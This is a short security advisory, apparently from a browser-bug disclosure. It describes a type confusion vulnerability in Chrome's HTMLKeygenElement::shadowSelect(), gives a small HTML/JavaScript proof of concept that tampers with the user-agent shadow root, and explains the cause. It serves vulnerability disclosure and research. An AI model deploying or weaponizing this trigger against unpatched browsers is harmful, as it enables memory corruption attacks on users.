Google Chrome suffers from a HTMLKeygenElement::shadowSelect() type confusion vulnerability.
92924ae358d484104a755cd03581b22f99405cbbdad6c145f777ffe6269d3fad
Google Chrome: Type confusion in HTMLKeygenElement::shadowSelect()
Chrome bug:
<a href="https://bugs.chromium.org/p/chromium/issues/detail?id=666246" title="" class="" rel="nofollow">https://bugs.chromium.org/p/chromium/issues/detail?id=666246</a>
PoC:
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Found by: ifratric